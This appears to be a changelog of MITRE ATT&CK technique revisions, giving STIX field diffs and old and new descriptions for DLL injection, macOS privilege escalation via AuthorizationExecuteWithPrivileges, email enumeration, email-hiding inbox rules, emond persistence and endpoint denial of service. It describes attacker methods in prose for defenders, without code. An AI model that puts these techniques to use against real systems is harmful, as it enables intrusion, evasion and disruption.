DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)
Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Boominathan Sundaram'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:20:00.382000+00:00 | 2022-10-18 21:07:23.748000+00:00 |
| description | Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. |
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)
Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. |
| external_references[1]['source_name'] | Elastic Process Injection July 2017 | Hiding Malicious Code with Module Stomping |
| external_references[1]['description'] | Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017. | Aliz Hammond. (2019, August 15). Hiding Malicious Code with "Module Stomping": Part 1. Retrieved July 14, 2022. |
| external_references[1]['url'] | https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process | https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/ |
| x_mitre_data_sources[0] | Process: Process Modification | Process: Process Metadata |
| x_mitre_data_sources[1] | Module: Module Load | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: OS API Execution | Process: Process Access |
| x_mitre_data_sources[3] | Process: Process Access | Process: Process Modification |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Elastic Process Injection July 2017', 'description': 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.', 'url': 'https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process'} | |
| external_references | {'source_name': 'Module Stomping for Shellcode Injection', 'description': 'Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.', 'url': 'https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection'} | |
| x_mitre_data_sources | Module: Module Load |
| Description |
|---|
Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 12:04:37.823000+00:00 | 2022-10-19 16:35:18.492000+00:00 |
| external_references[2]['source_name'] | Death by 1000 installers; it's all broken! | Carbon Black Shlayer Feb 2019 |
| external_references[2]['description'] | Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019. | Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. |
| external_references[2]['url'] | https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 | https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html |
| external_references[3]['source_name'] | Carbon Black Shlayer Feb 2019 | Death by 1000 installers; it's all broken! |
| external_references[3]['description'] | Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. | Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019. |
| external_references[3]['url'] | https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ | https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 |
| Old Description | New Description |
|---|---|
| Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). | Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)'] | |
| x_mitre_data_sources | ['Network Traffic: Network Traffic Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:27:19.702000+00:00 | 2022-10-21 14:30:10.979000+00:00 |
| description | Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). | Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)). |
| external_references[1]['source_name'] | HackersArise Email | Azure Active Directory Reconnaisance |
| external_references[1]['description'] | Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020. | Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022. |
| external_references[1]['url'] | https://www.hackers-arise.com/email-scraping-and-maltego | https://o365blog.com/post/just-looking/ |
| external_references[2]['source_name'] | CNET Leaks | GitHub Office 365 User Enumeration |
| external_references[2]['description'] | Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. | gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022. |
| external_references[2]['url'] | https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ | https://github.com/gremwell/o365enum |
| x_mitre_detection | Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. | Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GrimBlog UsernameEnum', 'description': 'GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.', 'url': 'https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/'} | |
| external_references | {'source_name': 'HackersArise Email', 'description': 'Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.', 'url': 'https://www.hackers-arise.com/email-scraping-and-maltego'} | |
| external_references | {'source_name': 'CNET Leaks', 'description': 'Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.', 'url': 'https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/'} |
| Description |
|---|
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:24:31.674000+00:00 | 2022-04-12 15:22:29.599000+00:00 |
| external_references[1]['source_name'] | Microsoft Inbox Rules | MacOS Email Rules |
| external_references[1]['description'] | Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021. | Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021. |
| external_references[1]['url'] | https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59 | https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac |
| external_references[2]['source_name'] | MacOS Email Rules | Microsoft BEC Campaign |
| external_references[2]['description'] | Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021. | Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021. |
| external_references[2]['url'] | https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac | https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ |
| external_references[3]['source_name'] | Microsoft New-InboxRule | Microsoft Inbox Rules |
| external_references[3]['description'] | Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021. | Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps | https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59 |
| external_references[4]['source_name'] | Microsoft Set-InboxRule | Microsoft New-InboxRule |
| external_references[4]['description'] | Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021. | Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps | https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps |
| external_references[5]['source_name'] | Microsoft Cloud App Security | Microsoft Set-InboxRule |
| external_references[5]['description'] | Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021. | Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021. |
| external_references[5]['url'] | https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154 | https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps |
| external_references[6]['source_name'] | Microsoft BEC Campaign | Microsoft Cloud App Security |
| external_references[6]['description'] | Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021. | Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021. |
| external_references[6]['url'] | https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ | https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154 |
| x_mitre_data_sources[1] | Command: Command Execution | Application Log: Application Log Content |
| x_mitre_data_sources[2] | Application Log: Application Log Content | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Google Workspace |
| Description |
|---|
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 21:37:25.307000+00:00 | 2022-04-20 00:16:01.732000+00:00 |
| external_references[1]['source_name'] | xorrior emond Jan 2018 | magnusviri emond Apr 2016 |
| external_references[1]['description'] | Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019. | Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019. |
| external_references[1]['url'] | https://www.xorrior.com/emond-persistence/ | http://www.magnusviri.com/Mac/what-is-emond.html |
| external_references[2]['source_name'] | magnusviri emond Apr 2016 | xorrior emond Jan 2018 |
| external_references[2]['description'] | Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019. | Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019. |
| external_references[2]['url'] | http://www.magnusviri.com/Mac/what-is-emond.html | https://www.xorrior.com/emond-persistence/ |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). | Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | |
| external_references | Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019. | |
| external_references | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | |
| external_references | CAPEC-227 | |
| external_references | CAPEC-131 | |
| external_references | CAPEC-130 | |
| external_references | CAPEC-125 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-227 | |
| external_references | CAPEC-131 | |
| external_references | CAPEC-130 | |
| external_references | CAPEC-125 | |
| external_references | Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019. | |
| external_references | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. | |
| external_references | Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:05:31.985000+00:00 | 2022-04-12 14:48:40.313000+00:00 |
| description | Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great 